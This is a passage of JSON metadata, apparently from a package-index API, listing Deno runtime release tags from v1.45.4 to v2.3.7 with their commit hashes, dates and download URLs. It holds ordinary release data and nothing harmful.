null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposito